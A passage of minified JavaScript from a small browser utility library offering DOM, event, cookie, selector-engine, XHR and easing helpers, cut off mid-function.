var aE=function(a6,a8){var J=a8.__init||function(){},a5=a8.__static||{},a7=a8.__extends,Q=J.prototype;av(Q,o);(a(a7)?a7:(a7?[a7]:[])).each(function(a9){av(Q,a9.prototype);J.__parent=a9});av(J,a5);["__init","__static","__extends"].each(function(a9){delete a8[a9]});av(Q,a8);Q.constructor=J;J.__name=a6;au[a6]=J;return J},o={fireEvent:function(){var J=O(arguments),a5="on"+I(J.shift()),Q=this[a5];if(aN(J)){J.push(this)}return Q?Q.apply(this,J):false},isInstanceOf:function(){return this.constuctor.__name},set:function(Q,J){var a5=this;if(H(Q)){return av(a5,Q)}a5[Q]=J;return a5}};au.defineClass=aE;
/* strings */
var aa=function(J,Q){return J.indexOf(Q)!==-1},aS=function(J){return J.replace(/\s{2,}/g," ").trim()},I=function(J,Q){return J.replace(Q?/^\s*[a-z]/:/(^|\s+)[a-z]/g,function(a5){return a5.toUpperCase()})},g=function(J){return J.replace(/-([a-z])/g,function(Q,a5){return a5.toUpperCase()})},aW=function(a7){var J=a7.match(/[\d]{1,3}/g),a5=[],Q=0;for(Q;Q<3;Q++){var a6=(J[Q]-0).toString(16);a5.push(a6.length===1?"0"+a6:a6)}return"#"+a5.join("")},ah=function(a6,a7){var a5=a6.match(/^#([\w]{1,2})([\w]{1,2})([\w]{1,2})$/),J=[],Q=1;for(Q;Q<a5.length;Q++){if(a5[Q].length===1){a5[Q]+=a5[Q]}J.push(parseInt(a5[Q],16))}return a7?J:"rgb("+J.join(",")+")"},aU=function(a7,a6){var Q=/^#/.test(a7),a5=[],J;switch(a6){case"hex":return Q?a7:aW(a7);case"rgb":return Q?ah(a7):a7;case"rgb-array":if(Q){return ah(a7,true)}else{J=a7.replace(/rgb| |\(|\)/g,"").split(",");J.each(function(a8){a5.push(parseInt(a8,10))});return a5}}},aO=function(Q,J){if(!J){return Q.replace(/<[^>]*>/g,"")}J=J.replace(/\s+/g,"").split(",").map(function(a5){return a5+" |"+a5+">|/"+a5+">"}).join("|");return Q.replace(new RegExp("<(?!"+J+")[^>]+>","g"),"")},aF=function(a5,Q){var J;while(J=/%\{\s*([^\}\s]+)\s*\}/.exec(a5)){a5=a5.replace(J[0],Q[J[1]]||"??")}return a5},f=function(Q){var a5=ao("div",{setHTML:Q}),J=[];O(R(a5,"script")).each(function(a6){J.push(ay["eval"](a6.innerHTML))});return J};av(au,{contains:aa,normalize:aS,capitalize:I,camelize:g,parseColour:aU,stripTags:aO,bindData:aF,evalScripts:f});
/* elements */
var aX=function(J,Q){J=aC(J);if(a4(J,Q)){return}J.className+=J.className?" "+Q:Q},aZ=function(J,a5){J=aC(J);if(!J.className){return}var Q=new RegExp("(^|\\s)"+a5+"(\\s|$)");J.className=aS(J.className.replace(Q," "))},a4=function(J,Q){return(" "+(aC(J)).className+" ").indexOf(Q)!==-1},z=function(J,Q){J=aC(J);if(a4(J,Q)){aZ(J,Q)}else{aX(J,Q)}},aC=function(J){return typeof J==="string"?K.getElementById(J):J},R=function(Q,J){return(J?aC(Q):K).getElementsByTagName(J||Q)},ao=function(bg,be){var Q;if(!/[#:\.]/.test(bg)){Q=K.createElement(bg),ar;for(ar in be){switch(ar){case"setHTML":Q.innerHTML=be[ar];break;case"setText":Q.appendChild(K.createTextNode(be[ar]));break;case"class":Q.className=be[ar];break;case"style":Q.style.cssText=be[ar];break;default:Q.setAttribute(ar,be[ar])}}}else{var bg=bg.trim(),a6="__JELLY_CE__",bd=[],a5;while(a5=/('|")([^\1]*?)\1/.exec(bg)){bg=bg.replace(a5[0],a6);bd.push(a5[2])}bg=bg.replace(/\s*(:|,)\s*/g,"$1");var a8=bg.split(" "),ba=a8.shift(),J=ba.indexOf("#")!==-1,bf=ba.indexOf(".")!==-1,bb="div",a7={},bc=null,a9;if(J||bf){a9=J?ba.split("#"):ba.split(".");bb=a9.shift()||bb;a7[J?"id":"class"]=a9.join(" ")}else{bb=ba}if(a8[0]){a8[0].split(",").each(function(bh){bh=bh.split(":");var bi=bh[1]===a6?bd.shift():bh[1];if(bh[0]==="@"){bc=bi}else{a7[bh[0]]=bi}})}Q=ao(bb.toLowerCase(),a7)}return be===true?{elem:Q,ref:bc}:Q},a2=function(){var J=O(arguments),a5={},Q,a6=function(a7){if(a7&&H(a7)){if(az(a7.root)){for(var a8 in a7){if(a(a7[a8])){var bc=a7[a8][0].nodeName.toLowerCase();a5[bc]=a5[bc]||[];a7[a8].each(function(bd){a5[bc].push(bd)})}else{if(a8!=="root"){a5[a8]=a7[a8]}}}return a7.root}else{if(az(a7)){return a7}}}else{if(!aY(a7)){return}}var bb=ao(a7,true),ba=bb.elem,a9=ba.nodeName.toLowerCase();a5[a9]=a5[a9]||[];a5[a9].push(ba);if(bb.ref){a5[bb.ref]=ba}return ba};a5.root=Q=a6(J.shift());J.each(function(a7){if(!a(a7)){Q=Q.appendChild(a6(a7))}else{a7.each(function(a8){Q.appendChild(a6(a8))})}});return a5},aD=function(Q,a6){Q=aC(Q);var a5=Q.parentNode,J=Q.nextSibling;a6.appendChild(Q);return J?a5.insertBefore(a6,J):a5.appendChild(a6)},l=function(Q,a5,J){Q=aC(Q);if(Q){return a5.call(J||Q,Q)}return Q},ak=function(Q,J){Q=aC(Q);return Q.parentNode.replaceChild(J,Q)},y=function(J){J=aC(J);return J.parentNode.removeChild(J)},aV=function(Q,J){Q=aC(Q);return(aC(J)||K.body).appendChild(Q)},j=function(Q,J){if(!(Q=aC(Q))||!(J=aC(J))){return false}if(J.firstChild){return J.insertBefore(Q,J.firstChild)}else{return J.appendChild(Q)}},an=function(Q,J){J=aC(J);return J.parentNode.insertBefore(aC(Q),J)},C=function(a5,J){if(!(a5=aC(a5))||!(J=aC(J))){return false}var Q=au.getNext(J);if(Q){return J.parentNode.insertBefore(a5,Q)}else{return J.parentNode.appendChild(a5)}},aT=function(J){J=J.firstChild;while(J&&J.nodeType!==1){J=J.nextSibling}return J},v=function(J){J=J.lastChild;while(J&&J.nodeType!==1){J=J.previousSibling}return J},M=function(J){J=J.nextSibling;while(J&&J.nodeType!==1){J=J.nextSibling}return J},at=function(J){J=J.previousSibling;while(J&&J.nodeType!==1){J=J.previousSibling}return J},D=function(J){var Q=[],J=J.firstChild;while(J){if(J.nodeType===1){Q[Q.length]=J}J=J.nextSibling}return Q},aM=function(Q){Q=aC(Q);var a8=[0,0];if(!Q){return a8}if("getBoundingClientRect" in Q){var a5=Q.getBoundingClientRect(),J=A(),a7=a5.left,a6=a5.top;a8=[a7+J[0],a6+J[1]]}else{a8=[Q.offsetLeft,Q.offsetTop];while(Q=Q.offsetParent){a8[0]+=Q.offsetLeft;a8[0]+=parseInt(aG(Q,"border-left-width"))||0;a8[1]+=Q.offsetTop;a8[1]+=parseInt(aG(Q,"border-top-width"))||0}}return a8},am=function(J,a6,a5,Q){J=aC(J);Q=Q||"px";J.style.left=a6+Q;J.style.top=a5+Q},w=function(J){return aM(J)[0]},aj=function(J,a5,Q){(aC(J)).style.left=a5+(Q||"px")},t=function(J){return aM(J)[1]},ai=function(J,a5,Q){(aC(J)).style.top=a5+(Q||"px")},s=function(){if(!aA(aR.hasAttribute)&&aB){return function(Q,J){switch(J){case"class":return Q.className||null;case"href":case"src":return Q.getAttribute(J,2)||null;case"style":return Q.getAttribute(J).cssText.toLowerCase()||null;case"for":return Q.attributes[J].nodeValue||null}return Q.getAttribute(J)||null}}return function(Q,J){return Q.getAttribute(J)}}(),aG=function(J,a5){var Q,a5=g(a5);if(a5==="opacity"){if(!aA(J.__opacity)){J.__opacity=1}return J.__opacity}if(J.style[a5]){return J.style[a5]}else{if("getComputedStyle" in ay){return ay.getComputedStyle(J,null)[a5]}else{if("currentStyle" in J){return J.currentStyle[a5]}}}},E=function(a5,Q,J){var a7=function(a9,a8){if(a9==="float"){a9="cssFloat"}if(a9==="opacity"){B(a5,a8)}else{a5.style[g(a9)]=a8}},a6;if(H(Q)){for(a6 in Q){a7(a6,Q[a6])}}else{if(J){a7(Q,J)}}},B=function(){if("filters" in aR){return function(J,Q){if(J.__opacity===undefined){J.__opacity=1}J.style.filter=Q===1?"":"alpha(opacity="+(Q*100)+")";J.__opacity=Q}}return function(J,Q){if(J.__opacity===undefined){J.__opacity=1}J.style.opacity=J.__opacity=Q}}(),P=function(a5,Q,a6){var J=aP,a7=J.ns;if(!(a5=aC(a5))){return}if(!(a7 in a5)){a5[a7]=ag();J[a5[a7]]={}}J[a5[a7]][Q]=a6},ax=function(a5,Q){var J=aP,a6=J.ns;if(!(a5=aC(a5))){return}if(a6 in a5&&a5[a6] in J){return J[a5[a6]][Q]}return null},V=function(a5,Q){var J=aP,a6=J.ns;if(!(a5=aC(a5))){return}if(a6 in a5&&a5[a6] in J){delete J[a5[a6]][Q]}},aP={ns:"jelly_"+(+new Date)},ag=function(){var J=0;return function(){return ++J}}();av(au,{addClass:aX,removeClass:aZ,hasClass:a4,toggleClass:z,getElements:R,getElement:aC,createElement:ao,createBranch:a2,wrapElement:aD,withElement:l,replaceElement:ak,removeElement:y,insertElement:aV,insertTop:j,insertBefore:an,insertAfter:C,getFirst:aT,getLast:v,getNext:M,getPrevious:at,getChildren:D,getXY:aM,setXY:am,getX:w,setX:aj,getY:t,setY:ai,getAttribute:s,getStyle:aG,setStyle:E,setOpacity:B,storeData:P,retrieveData:ax,removeData:V});
/* events */
var Z=function(a8,a5,Q){a8=aC(a8);var J=a5==="mouseenter",a6=a5==="mouseleave",a9,a7;if(a8===K&&a5==="domready"){return q(Q)}if(!N){a9=function(ba){Q.call(a8,e(ba))}}if(J||a6){a9=function(ba){ba=e(ba);if(!G.call(a8,ba)){return}Q.call(a8,ba)};a5=J?"mouseover":"mouseout"}a7=[a8,a5,a9||Q];m.push(a7);if(N){a8.addEventListener(a5,a9||Q,false)}else{a8.attachEvent("on"+a5,a9)}return a7},ac=function(J){if(J){if(!a(J)){return X(J)}if(N){J[0].removeEventListener(J[1],J[2],false)}else{J[0].detachEvent("on"+J[1],J[2])}}},m=[],L=function(){for(var J=0,Q;m[J];J++){Q=m[J];if(Q[0]!==ay&&Q[1]!=="unload"){ac(Q)}}},e=function(){if(N){return function(J){return J}}return function(J){J=ay.event;J.target=J.srcElement;J.relatedTarget=function(){switch(J.type){case"mouseover":return J.fromElement;case"mouseout":return J.toElement}}();J.stopPropagation=function(){J.cancelBubble=true};J.preventDefault=function(){J.returnValue=false};J.pageX=J.clientX+aR.scrollLeft;J.pageY=J.clientY+aR.scrollTop;return J}}(),G=function(a7){var a6,a5;if(a7.relatedTarget){try{a6=a7.relatedTarget;if(a6.nodeType!==1||a6===this){return false}var Q=this.getElementsByTagName("*"),a8=Q.length,a5=0;for(a5;a8>a5;a5++){if(a6===Q[a5]){return false}}}catch(J){}}return true},n=function(J){J=e(J);J.stopPropagation();J.preventDefault();return J};av(au,{addEvent:Z,removeEvent:ac,stopEvent:n,fixEvent:e});Z(ay,"unload",L);
/* dom ready */
(function(){var Q=au.DomReady={ready:false,handlers:{},add:function(a9,a8){var a8=a8||++a5;Q.handlers[a8]=a9;return a8},remove:function(a8){delete Q.handlers[a8]},fire:function(){if(Q.ready){return}Q.ready=true;clearTimeout(a6);for(var a9 in Q.handlers){try{Q.handlers[a9]()}catch(a8){ab(a8)}}}},a5=0,a6,a7=function(){if(K.readyState==="complete"){K.detachEvent("onreadystatechange",a7);Q.fire()}},J=function(){try{aR.doScroll("left")}catch(a8){a6=setTimeout(J,10);return}Q.fire()};if(N){Z(K,"DOMContentLoaded",Q.fire)}else{K.attachEvent("onreadystatechange",a7);if(ay===top){a6=setTimeout(J,0)}}Z(ay,"load",Q.fire)})();var r=au.DomReady,q=function(Q,J){return r.add(Q,J||null)},X=function(J){r.remove(J)};av(au,{addDomReady:q,removeDomReady:X});
/* cookies */
av(au,{getCookie:function(Q){var J=new RegExp(Q+"=([^; ]+)").exec(K.cookie);return J?unescape(J[1]):null},setCookie:function(Q,a7,J,a9,a6,a8){if(J){var a5=(+new Date)+((1000*60*60*24)*J);J=new Date(a5).toUTCString()}K.cookie=Q+"="+escape(a7)+(J?";expires="+J:"")+(a9?";path="+a9:"")+(a6?";domain="+a6:"")+(a8?";secure":"")},removeCookie:function(J,a5,Q){if(au.getCookie(J)){K.cookie=J+"="+(a5?";path="+a5:"")+(Q?";domain="+Q:"")+(";expires="+new Date(0))}}});
/* flash */
av(au,{getFlashVersion:function(){var J={major:0,build:0},a5=navigator.plugins,a8,Q;if(a5&&H(a5["Shockwave Flash"])){a8=a5["Shockwave Flash"].description;if(a8!==null){Q=a8.replace(/^[^\d]+/,"");version.major=parseInt(Q.replace(/^(.*)\..*$/,"$1"),10);version.build=parseInt(Q.replace(/^.*r(.*)$/,"$1"),10)}}else{if(aB){try{var a7=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");a8=a7.GetVariable("$version");if(a8!==null){Q=a8.replace(/^\S+\s+(.*)$/,"$1").split(",");version.major=parseInt(Q[0],10);version.build=parseInt(Q[2],10)}}catch(a6){}}}return version},createFlashObject:function(a7,a5,J,a9,a8,a6,Q){var a8=a8||{};a6=a6||{},attrs=Q||{},a9=a9||'You need <a href="http://www.adobe.com/go/getflashplayer">Adobe Flash Player</a> installed to view this content</a>',data=[],ar,output="<object";if(aB){attrs.classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000";a8.movie=a7}else{attrs.data=a7;attrs.type="application/x-shockwave-flash"}attrs.width=a5;attrs.height=J;for(ar in attrs){output+=" "+i+'="'+attr[i]+'"'}output+=">\n";for(ar in a6){data.push(ar+"="+encodeURIComponent(a6[ar]))}if(data.length>0){a8.flashvars=data.join("&")}for(ar in a8){output+='\t<param name="'+ar+'" value="'+a8[ar]+'" />\n'}return output+a9+"\n</object>"},embedFlashObject:function(a6,a8,a5,J,a9,a7,Q){a6=aC(a6);a6.innerHTML=au.createFlashObject(a8,a5,J,a6.innerHTML,a9||{},a7||{},Q||{})}});
/* misc utilities */
var ae=function(){if(aA(aR.clientWidth)&&aR.clientWidth!==0){return function(){return[aR.clientWidth,aR.clientHeight]}}return function(){return[K.body.clientWidth||0,K.body.clientHeight||0]}}(),A=function(){if(aA(ay.pageYOffset)){return function(){return[ay.pageXOffset,ay.pageYOffset]}}return function(){if(aA(aR.scrollTop)&&(aR.scrollTop>0||aR.scrollLeft>0)){return[aR.scrollLeft,aR.scrollTop]}return[K.body.scrollLeft,K.body.scrollTop]}}(),aw=function(a5){a5=a5||ay.location;var a6={};if(/\?/.test(a5.href)){var J=a5.href.split("?")[1].split("&"),Q=J.length-1,a7;do{a7=J[Q].split("=");a6[a7[0]]=decodeURIComponent(a7[1].replace(/\+/g,"%20"))}while(Q--)}return a6},af=function(){var J=function(a5,a6){if(!a5){return}if(callbackFilter){a6=callbackFilter.call(a6,a6)}data.push(a5+"="+encodeURIComponent(a6).replace(/%20/g,"+"))},Q=function(a7){if(!az(a7)||!/^(input|textarea|select)$/i.test(a7.nodeName)){return}var a6=a7.type.toLowerCase(),a5=a7.name,a8=a7.value;switch(a6){case"checkbox":if(a7.checked){J(a5,a8||"on")}break;case"radio":if(a7.checked){J(a5,a8)}break;default:J(a5,a8)}};args=O(arguments),callbackFilter=aL(args[args.length-1])?args.pop():null;data=[];args.each(function(a5){if(H(a5)&&ap(a5.length)){(a(a5)?a5:O(a5)).each(Q)}else{if(H(a5,true)){for(var a6 in a5){J(a6,a5[a6])}}else{if(aY(a5)||az(a5)){var a7=aC(a5);if(a7){Q(a7);au.Q(a7,"textarea, input, select").each(Q)}else{data.push(a5)}}}}});return data.join("&")},aJ=function(){var J=["var J=JELLY"],a5,Q=1;for(a5 in au){J[Q++]=a5+"=J."+a5}return J.join(",")+";"};av(au,{getViewport:ae,getWindowScroll:A,parseQuery:aw,buildQuery:af,unpack:aJ});
/* page init */
if(aK.ie6){try{K.execCommand("BackgroundImageCache",false,true)}catch(a3){}}var T=["unknown"],ar;for(ar in aK){if(aK[ar]){if(T[0]==="unknown"){T=[ar]}else{T.push(ar)}}}aX(aR,"js "+T.join(" "));
/* selector engine */
(function(){var bw=function(bB){bf[bf.length]=bB},bA=function(bC){for(var bB=0,bD=bC.length;bB<bD;bB++){bC[bB][bg]=null}},bc=function(bC){var bB,bE=bC.length,bD=[];while(bE){bB=bC[--bE];if(!bB[bg]){bB[bg]=true;bD[bD.length]=bB}}bE=bD.length;while(bE){bD[--bE][bg]=null}return bD.reverse()},bb=function(bC,bB){var bE={mode:bB?bq:be,not:false,type:a8};if(/^(\w+)?#\w/.test(bC)){bE.val=bC.split("#")}else{if(/^\w+|\*$/.test(bC)){bE.type=bp;bE.val=bC}else{if(/^\.\w/.test(bC)){bE.type=bd;bE.val=bC.replace(/^\./,"")}else{if(/^\[/.test(bC)){bE.type=br;bE.val=bC.replace(/\[|\]/g,"")}else{if(/^\+|>|~/.test(bC)){bE.type=a6;bE.val=bC}else{if(/:not\(/.test(bC)){bE=bb(bC.replace(/\:not\(|\)$/g,""));bE.not=true}else{if(/^:/.test(bC)){var bD=bC.replace(/^:|\)$/g,"").split("(");bE.type=a7;bE.kind=bD[0];bE.val=bD[1]}}}}}}}return bE},bv=function(bC){var bK=[],bE=aS(bC.replace(/(>|~(?!=)|\+(?!\d))/g," $1 ")).split(" "),bJ={mode:bq,type:bp,val:"*"},bB="getElementsByClassName" in K,bI=false;for(var bG=0,bH;bG<bE.length;bG++){bH=bE[bG].replace(/([^\(\#\.\[])(:)/g,"$1 $2").replace(/([^\(])(\[|\.)/g,"$1 $2").replace(/\:not\(\s*/g,":not(").trim().split(" ");for(var bD=0,bF;bD<bH.length;bD++){bF=bb(bH[bD],!bD);if(bI){bF.mode=be}else{if(bD===0&&(bF.type===a7||bF.type===br||(bF.type===bd&&!bB)||bF.not)){bK.push(bJ);bF.mode=be}}if(aa(bH[bD],bg)){bF[bF.type===br?"spValue":"val"]=a9.shift()}bK.push(bF);bI=/^(~|\+)$/.test(bF.val)}}bK.postFilter=!(bE.length===1||bE.length===3&&/^[\+~]$/.test(bE[1]));return bK},Q=function(bD){var bB=bD.val[0],bH=bD.val[1];if(bD.mode===be){for(var bE=0,bG=bo.length;bE<bG;bE++){if(bB){if((bo[bE].tagName.toLowerCase()===bB&&bo[bE].id===bH)!==bD.not){bw(bo[bE])}}else{if((bo[bE].id===bH)!==bD.not){bw(bo[bE])}}if(!bD.not&&bf[0]){return}}}else{if(!bB){bf[0]=aC(bH)}else{var bF=aC(bH);if(bF&&bF.tagName.toLowerCase()===bB){bf[0]=bF}}if(!ba&&bf[0]){var bC=false;for(var bE=0,bG=bo.length;bE<bG;bE++){if(bf[0].contains(bo[bE])){bC=true;break}}if(!bC){bf[0]=null}}}},bs=function(bC){var bB=aB&&bC.val==="*";if(ba){for(var bG=0,bE=R(bC.val),bI=bE.length;bG<bI;bG++){if(bB){if(bE[bG].nodeType===1){bw(bE[bG])}}else{bw(bE[bG])}}}else{if(bC.not||bC.mode===be){for(var bG=0,bH=bC.val.toUpperCase(),bI=bo.length;bG<bI;bG++){if((bo[bG].nodeName.toUpperCase()===bH)!==bC.not){bw(bo[bG])}}}else{for(var bG=0,bI=bo.length;bG<bI;bG++){var bE=R(bo[bG],bC.val),bF=bE.length,bD=0;for(bD;bD<bF;bD++){if(bB){if(bE[bD].nodeType===1){bw(bE[bD])}}else{bw(bE[bD])}}}}}},J=function(bD){var bC=bD.val,bE=bD.not,bB=bo.length,bH=0;if(bD.mode===bq){if(ba){bf=O(K.getElementsByClassName(bC))}else{for(bH;bH<bB;bH++){var bK=bo[bH].getElementsByClassName(bC),bJ=bK.length,bG=0;for(bG;bG<bJ;bG++){bw(bK[bG])}}}}else{var bI=new RegExp("(^|\\s)"+bC+"(\\s|$)"),bF;for(bH;bH<bB;bH++){bF=bo[bH].className;if(!bF){if(bE){bw(bo[bH])}continue}if(bI.test(bF)!==bE){bw(bo[bH])}}}},by={"=":function(bB,bC){return bB===bC},"^=":function(bB,bC){return bB.indexOf(bC)===0},"$=":function(bB,bC){return bB.substr(bB.length-bC.length)===bC},"*=":function(bB,bC){return bB.indexOf(bC)!==-1},"|=":function(bB,bC){return bB.indexOf(bC)===0},"~=":function(bB,bC){return(" "+bB+" ").indexOf(" "+bC+" ")!==-1}},bl=function(bC){var bG=bo.length,bD=0;if(aa(bC.val,"=")){var bE=/([\w-]+)([^=]?=)(.+)/.exec(bC.val),bB,bF=aA(bC.spValue)?bC.spValue:bE[3];for(bD;bD<bG;bD++){bB=s(bo[bD],bE[1]);if((bB!==null&&by[bE[2]](bB,bF))!==bC.not){bw(bo[bD])}}}else{for(bD;bD<bG;bD++){if((s(bo[bD],bC.val)!==null)!==bC.not){bw(bo[bD])}}}},bm=function(bB){var bD=bB.kind,bE=bB.not;if(/^(nth-|first-of|last-of)/.test(bD)){bf=bt[bD](bo,bB)}else{if(bD==="root"&&!bE){bf[0]=rootElement}else{if(bD==="target"&&!bE){var bF=ay.location.href.split("#")[1]||null;bf[0]=aC(bF)||R(bF)[0]}else{for(var bC=0,bG=bo.length;bC<bG;bC++){if(bt[bD](bo[bC],bB)!==bE){bw(bo[bC])}}}}}},bn=function(bC){var bB={mode:"all"};bB.direction=bC.indexOf("-")===0?"neg":"pos";if(bC==="n"){return bB}else{if(/^\d+$/.test(bC)){bB.mode="child";bB.val=parseInt(bC,10);return bB}}bB.mode="an+b";if(/^(even|2n|2n\+2)$/.test(bC)){bB.oddEven=0}else{if(/^(odd|2n\+1)$/.test(bC)){bB.oddEven=1}}var bD=bC.split("n");bB.start=bD[1]?parseInt(bD[1],10):1;bB.jump=bD[0]&&bD[0]!=="-"?parseInt(bD[0].replace(/^\-/,""),10):1;return bB},bx=function(bJ,bN,bG,bP,bH){bN=bn(bN);if(bN.mode==="all"){return bJ}var bQ=[],bO=[],bM=bJ[0].nodeName,bF=bG?function(bR){return bR.nodeType===1&&bR.nodeName===bM}:function(bR){return bR.nodeType===1},bD=function(bR){if(bR){bQ.push(bJ[bI])}};for(var bI=0,bE=bJ.length,bB,bK;bI<bE;bI++){bB=bJ[bI].parentNode,bK=1;if(!bB[bg]){var bC=bB[!bP?"firstChild":"lastChild"],bL=!bP?"nextSibling":"previousSibling";for(bC;bC;bC=bC[bL]){if(bF(bC)){bC.nodeIndex=bK++}}bB[bg]=1;bO.push(bB)}if(bN.mode==="child"){bD(((bJ[bI].nodeIndex===bN.val)!==bH))}else{if(aA(bN.oddEven)){bD((bJ[bI].nodeIndex%2===bN.oddEven)!==bH)}else{if(bN.direction==="pos"){if(bJ[bI].nodeIndex<bN.start){if(bH){bD(true)}}else{bD(((bJ[bI].nodeIndex-bN.start)%bN.jump===0)!==bH)}}else{if(bJ[bI].nodeIndex>bN.start){if(bH){bD(true)}}else{bD(((bN.start-bJ[bI].nodeIndex)%bN.jump===0)!==bH)}}}}}bA(bO);return bN.direction==="neg"?bQ.reverse():bQ},bt={"nth-child":function(bC,bB){return bx(bC,bB.val,false,false,bB.not)},"nth-of-type":function(bC,bB){return bx(bC,bB.val,true,false,bB.not)},"nth-last-child":function(bC,bB){return bx(bC,bB.val,false,true,bB.not)},"nth-last-of-type":function(bC,bB){return bx(bC,bB.val,true,true,bB.not)},"first-of-type":function(bC,bB){return bx(bC,"1",true,false,bB.not)},"last-of-type":function(bC,bB){return bx(bC,"1",true,true,bB.not)},"only-child":function(bB){return !M(bB)&&!at(bB)},"only-of-type":function(bE){var bC=R(bE.parentNode,bE.nodeName);if(bC.length===1&&bC[0].parentNode===bE.parentNode){return true}else{for(var bB=true,bG=bC.length,bD=0,bF=0;bD<bG;bD++){if(bE.parentNode===bC[bD].parentNode){bF++;if(bF>1){return false}}}return true}},"first-child":function(bB){return !at(bB)},"last-child":function(bB){return !M(bB)},checked:function(bB){return bB.checked},enabled:function(bB){return !bB.disabled},disabled:function(bB){return bB.disabled},empty:function(bB){return !bB.firstChild},lang:function(bC,bB){return bC.getAttribute("lang")===bB.val},root:function(bB){return bB===rootElement},target:function(bB){var bC=ay.location.href.split("#")[1]||null;return bB.id===bC||bB.name===bC}},bj=function(){for(var bB=0,bD=bo.length,bC;bB<bD;bB++){if(bC=M(bo[bB])){bw(bC)}}},bi=function(){var bB=[],bG=[],bF=bo.length,bC=0,bD,bE;for(bC;bC<bF;bC++){bE=bo[bC].parentNode;bE[bg]=true;bB.push({parent:bE,child:bo[bC]})}for(bC=0;bC<bB.length;bC++){if(bB[bC].parent[bg]){bB[bC].parent[bg]=null;bG.push(bB[bC].child)}}for(bC=0;bC<bG.length;bC++){bD=bG[bC].nextSibling;while(bD){if(bD.nodeType===1){bw(bD)}bD=bD.nextSibling}}},bk=function(){var bC=[],bF=bo.length,bG=bf.length,bB,bE=0,bD;for(bE;bE<bG;bE++){bB=bf[bE].parentNode;for(bD=0;bD<bF;bD++){if(bo[bD]===bB){bC.push(bf[bE]);break}}}bf=bC},ba=1,a9=[],bg="__JELLY_Q__",bf=[],bo=[],be=1,bq=2,a8=3,bp=4,bd=5,br=6,a7=7,a6=8,bh=function(bN,bM){var bL=!!bM,bH=bL?bM:bN;bo=bL?[bN]:[];if(ba){var bF;while(bF=/('|")([^\1]*?)\1/.exec(bH)){a9.push(bF[2]);bH=bH.split(bF[0]);bH=[bH[0],bg,bH[1]].join("")}}if(aa(bH,",")){var bE=[],bI=bH.split(","),bC;ba=0;while(bC=bI.shift()){bE=bE.concat(bL?bh(bN,bC):bh(bC))}ba=1;return bc(bE)}ba=!bM;var bK=bv(bH),bB=null;for(var bJ=0,bD=bK.length,bG;bJ<bD;bJ++){bf=[];bG=bK[bJ];switch(bG.type){case a8:Q(bG);break;case bp:bs(bG);break;case bd:J(bG);break;case br:bl(bG);break;case a7:bm(bG);break;case a6:if(bG.val==="+"){bj(bG)}else{if(bG.val==="~"){bi(bG)}}}if(bB){bk()}if(bG.val===">"){bB=true;continue}if(!bf[0]){return[]}bB=null;ba=0;bo=bf}if(bK.postFilter){return bz(bc(bo))}return bz(bo)},a5=function(bC,bB){try{return bz(O(bB?bC.querySelectorAll(bB):K.querySelectorAll(bC)))}catch(bD){aH(bD)}},bz=function(bC){for(var bB in bu){bC[bB]=bu[bB]}return bC},bu={};["addClass","removeClass","setStyle","addEvent"].each(function(bB){bu[bB]=function(){var bC=O(arguments),bE=this.length,bD=0;for(bD;bD<bE;bD++){au[bB].apply({},[this[bD]].concat(bC))}return this}});au.Q=function(){if(S){if(!aK.ie){return a5}return function(bC,bB){if(/\:(nth|las|onl|not|tar|roo|emp|ena|dis|che)/.test(bB||bC)){return bh(bC,bB)}return a5(bC,bB)}}return bh}()})();var al=au.Q;
/* request */
(function(){var J=aE("Request",{__init:function(Q){av(this,Q)},__static:{timeout:15000},noCache:true,async:true,cleanUp:true,feedback:{start:W,stop:W},requestHeaders:{},send:function(Q,a6,ba){var bc=this,a5=a6,a7=null,Q=Q.toUpperCase(),bb=bc.xhr?bc.xhr:bc.getXHR();if(bc.inProgress||!bb){return false}if(Q==="POST"){var a8=a6.split("?");a5=a8[0];a7=a8[1];bc.requestHeaders["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8";bc.requestHeaders["Content-length"]=a7.length}if(Q==="GET"&&bc.noCache){bc.requestHeaders["If-Modifed-Since"]="Sat, 1 Jan 2000 00:00:00 GMT"}bb.open(Q,a5,bc.async);bb.onreadystatechange=function(){if(bb.readyState===4){bc.fireEvent("complete",bb);clearTimeout(bc.timer);bc.feedback.stop();var bd=bb.status,be=(bd>=200&&bd<300)||bd===304||(bd===undefined&&aK.webkit);if(be){bc.fireEvent("success",bb);if(ba){ba.call(bc,bb)}}else{bc.fireEvent("fail",bb)}if(bc.cleanUp){bc.xhr=null}bc.inProgress=false}};for(var a9 in bc.requestHeaders){bb.setRequestHeader(a9,bc.requestHeaders[a9])}bb.setRequestHeader("X-Requested-With","XMLHttpRequest");bc.feedback.start();bc.timer=setTimeout(function(){bb.abort();bc.fireEvent("timeout",bb);bc.inProgress=false},bc.timeout||J.timeout);bc.inProgress=true;bb.send(a7);bc.fireEvent("request",bb);return true},post:function(Q,a5,a6){return this.send("post",Q+"?"+(a5||"empty"),a6)},get:function(Q,a5){return this.send("get",Q,a5)},getXHR:function(){if("XMLHttpRequest" in ay){return function(){return new XMLHttpRequest()}}return function(){var a5=false;try{a5=new ActiveXObject("Msxml2.XMLHTTP")}catch(Q){try{a5=new ActiveXObject("Microsoft.XMLHTTP")}catch(Q){}}return a5}}()})})();
/* easings */
au.easings={linear:function(a6,J,Q,a5){return Q*a6/a5+J},quadIn:function(a6,J,Q,a5){return Q*(a6/=a5)*a6+J},quadOut:function(a6,J,Q,a5){return -Q*(a6/=a5)*(a6-2)+J},quadInOut:function(a6,J,Q,a5){if((a6/=a5/2)<1){return Q/2*a6*a6+J}return -Q/2*((--a6)*(a6-2)-1)+J},cubicIn:function(a6,J,Q,a5){return Q*(a6/=a5)*a6*a6+J},cubicOut:function(a6,J,Q,a5){return Q*((a6=a6/a5-1)*a6*a6+1)+J},cubicInOut:function(a6,J,Q,a5){if((a6/=a5/2)<1){return Q/2*a6*a6*a6+J}return Q/2*((a6-=2)*a6*a6+2)+J},quartIn:function(a6,J,Q,a5){return Q*(a6/=a5)*a6*a6*a6+J},quartOut:function(a6,J,Q,a5){return -Q*((a6=a6/a5-1)*a6*a6*a6-1)+J},quartInOut:function(a6,J,Q,a5){if((a6/=a5/2)<1){return Q/2*a6*a6*a6*a6+J}return -Q/2*((a6-=2)*a6*a6*a6-2)+J},quintIn:function(a6,J,Q,a5){return Q*(a6/=a5)*a6*a6*a6*a6+J},quintOut:function(a6,J,Q,a5){return Q*((a6=a6/a5-1)*a6*a6*a6*a6+1)+J},quintInOut:function(a6,J,Q,a5){if((a6/=a5/2)<1){return 